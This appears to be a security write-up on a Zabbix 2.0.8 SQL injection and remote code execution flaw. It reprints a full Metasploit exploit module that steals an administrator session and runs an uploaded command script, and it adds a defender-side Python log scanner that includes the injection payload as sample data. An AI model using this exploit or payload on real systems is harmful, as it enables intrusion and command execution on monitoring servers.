Vulnerability in Zabbix

First, a brief explanation of the Zabbix software for those who are not familiar with it.

Zabbix is open-source software, first released on 19 April 2001 by Alexei Vladishev, for real-time monitoring and complete supervision of networks and applications at the Enterprise level. It is designed to monitor and track the status of network services, servers and other network hardware.

Two vulnerabilities, SQL injection and Remote Code Execution, in Zabbix version 2.0.8 and earlier

Zabbix is therefore exposed to an unauthenticated SQL injection: an attacker can inject SQL and use the injection to retrieve an active session ID from the database. If the retrieved session belongs to an Administrators-level user, that user can upload and run remote scripts via the scripts_exec.php file, which yields remote command execution and so turns the flaw into an RCE (Remote Code Execution) vulnerability. An exploit for this vulnerability is available in Metasploit.

To load the exploit for this vulnerability, use the following module path:

msf5 > use exploit/linux/http/zabbix_sqli 
msf5 exploit(linux/http/zabbix_sqli) >

Exploit source code:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Zabbix 2.0.8 SQL Injection and Remote Code Execution",
      'Description'    => %q{
        This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix
        versions 2.0.8 and lower.  The SQL injection issue can be abused in order to retrieve an
        active session ID.  If an administrator level user is identified, remote code execution
        can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
          'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2013-5743'],
          ['URL', 'https://support.zabbix.com/browse/ZBX-7091']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Zabbix version <= 2.0.8', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 255,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python'
            }
        },
      'DisclosureDate' => "Sep 23 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix'])
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    # Check version
    vprint_status("Trying to detect installed version")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "httpmon.php")
    })

    if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
      version = $1
      vprint_status("Zabbix version #{version} detected")
    else
      # If this fails, guest access may not be enabled
      vprint_status("Unable to access httpmon.php")
      return Exploit::CheckCode::Unknown
    end

    if version and version <= "2.0.8"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def get_session_id
    # Generate random string and convert to hex
    sqlq = rand_text_alpha(8)
    sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join

    sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
    sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 "
    sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

    # Extract session id from database
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "httpmon.php"),
      'vars_get' => {
        "applications" => sqli
      }
    })

    if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/
      session = $1
      print_status("Extracted session cookie - [ #{session} ]")
      return session
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session")
    end
  end

  def exploit
    # Retrieve valid session id
    @session = get_session_id
    @sid = "#{@session[16..-1]}"
    script_name = rand_text_alpha(8)

    # Upload script
    print_status("Attempting to inject payload")
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => "zbx_sessionid=#{@session}",
      'uri'    => normalize_uri(uri, "scripts.php"),
      'vars_post' => {
        'sid' => @sid,
        'form' => 'Create+script',
        'name' => script_name,
        'type' => '0',
        'execute_on' => '1',
        'command' => payload.encoded,
        'commandipmi' => '',
        'description' => '',
        'usrgrpid' => '0',
        'groupid' => '0',
        'access' => '2',
        'save' => 'Save'
      }
    })

    if res and res.code == 200 and res.body =~ /(Script added)/
      print_good("Payload injected successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Payload injection failed!")
    end

    # Extract 'scriptid' value
    @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body)

    # Trigger Payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "scripts_exec.php"),
      'cookie' => "zbx_sessionid=#{@session}",
      'vars_get' => {
        "execute" => 1,
        "scriptid" => @scriptid,
        "sid" => @sid,
        "hostid" => "10084"
      }
    })
  end

  def cleanup
    post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)"
    print_status("Cleaning script remnants")
    res = send_request_cgi({
      'method' => 'POST',
      'data'   => post_data,
      'cookie' => "zbx_sessionid=#{@session}",
      'uri'    => normalize_uri(uri, "scripts.php")
    })

    if res and res.code == 200 and res.body =~ /(Script deleted)/
      print_good("Script removed successfully")
    else
      print_warning("Unable to remove script #{@scriptid}")
    end
  end
end
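As an added example, not part of the original post or of the Metasploit module above, the following Python script shows two defender-side checks that follow directly from the module's logic. First, a numeric version comparison for deciding whether an installation is in the affected range (2.0.8 and lower): the module's check method compares version strings lexicographically, which would sort a version such as 2.0.10 as "lower" than 2.0.8. Second, a scan of web-server access logs for the httpmon.php injection pattern on the applications parameter, correlated with a later scripts_exec.php execute request from the same client, which is the two-step chain the module performs. The log lines, IP addresses, session id and script id are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

# Fragments of the error-based injection sent to httpmon.php?applications=
# in the module above. Matched case-insensitively on the URL-decoded value.
SQLI_MARKERS = (
    "select", "information_schema", "zabbix.sessions",
    "floor(rand(", "group by", "concat(",
)


def parse_version(v):
    """'2.0.8' -> (2, 0, 8); a non-numeric tail such as '8rc1' keeps its digits."""
    parts = []
    for piece in v.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected_version(version, last_bad="2.0.8"):
    """Numeric comparison: affected if version <= 2.0.8 (page: '2.0.8 and lower')."""
    return parse_version(version) <= parse_version(last_bad)


def sqli_score(value):
    """Number of injection markers present in one parameter value."""
    v = value.lower()
    return sum(1 for marker in SQLI_MARKERS if marker in v)


def analyze(log_lines, min_markers=2):
    """Return (sqli_hits, exec_follow_ups).

    sqli_hits: httpmon.php requests whose 'applications' value carries at
    least min_markers injection fragments.
    exec_follow_ups: scripts_exec.php?execute=1 requests from a client that
    was already flagged for the injection earlier in the log.
    """
    sqli_hits, follow_ups, flagged_ips = [], [], set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts = m.group("ip"), m.group("ts")
        parts = urlsplit(m.group("path"))
        params = parse_qs(parts.query, keep_blank_values=True)
        page = parts.path.rsplit("/", 1)[-1]
        if page == "httpmon.php":
            score = max((sqli_score(v) for v in params.get("applications", [])), default=0)
            if score >= min_markers:
                sqli_hits.append({"ip": ip, "ts": ts, "markers": score,
                                  "status": int(m.group("status"))})
                flagged_ips.add(ip)
        elif page == "scripts_exec.php" and params.get("execute") == ["1"] and ip in flagged_ips:
            follow_ups.append({"ip": ip, "ts": ts,
                               "scriptid": params.get("scriptid", ["?"])[0]})
    return sqli_hits, follow_ups


# Constructed sample: the URL-encoded form of the module's payload (0x41 stands
# in for the random hex marker) and a constructed sid/scriptid.
PAYLOAD = (
    "2%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x41,(SELECT%20MID((IFNULL(CAST"
    "(sessionid%20AS%20CHAR),0x20)),1,50)%20FROM%20zabbix.sessions%20WHERE%20status=0%20and%20"
    "userid=1%20LIMIT%200,1),0x41,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS"
    "%20GROUP%20BY%20x)a)"
)
SAMPLE_LOG = [
    '198.51.100.20 - - [23/Sep/2013:10:14:55 +0000] "GET /zabbix/httpmon.php?applications=5 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [23/Sep/2013:10:14:58 +0000] "GET /zabbix/dashboard.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [23/Sep/2013:10:15:01 +0000] "GET /zabbix/httpmon.php?applications={PAYLOAD} HTTP/1.1" 200 5123 "-" "python-requests/2.0"',
    '203.0.113.7 - - [23/Sep/2013:10:15:03 +0000] "GET /zabbix/scripts_exec.php?execute=1&scriptid=7&sid=abcdef0123456789&hostid=10084 HTTP/1.1" 200 310 "-" "python-requests/2.0"',
    'this line is not an access-log entry and is skipped',
]

if __name__ == "__main__":
    for ver in ("2.0.8", "2.0.10", "1.8.16", "2.2.0"):
        print(f"{ver}: affected={is_affected_version(ver)} (string compare says {ver <= '2.0.8'})")
    hits, execs = analyze(SAMPLE_LOG)
    for h in hits:
        print("SQLi against httpmon.php:", h)
    for e in execs:
        print("scripts_exec.php run by flagged client:", e)
```

The marker threshold (`min_markers=2`) keeps a lone word like `select` in a legitimate filter from raising an alert; tune it against your own traffic. The version check is the one to run on inventory data, since the module's lexicographic comparison is the reason a `2.0.10` host would be mis-rated by `check` alone.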

Github: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zabbix_sqli.rb

Description:

ID MSF:EXPLOIT/LINUX/HTTP/ZABBIX_SQLI

Type metasploit

Reporter Rapid7

Modified 2017-07-24 13:26:21

CVSS 7.5

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5743

https://support.zabbix.com/browse/ZBX-7091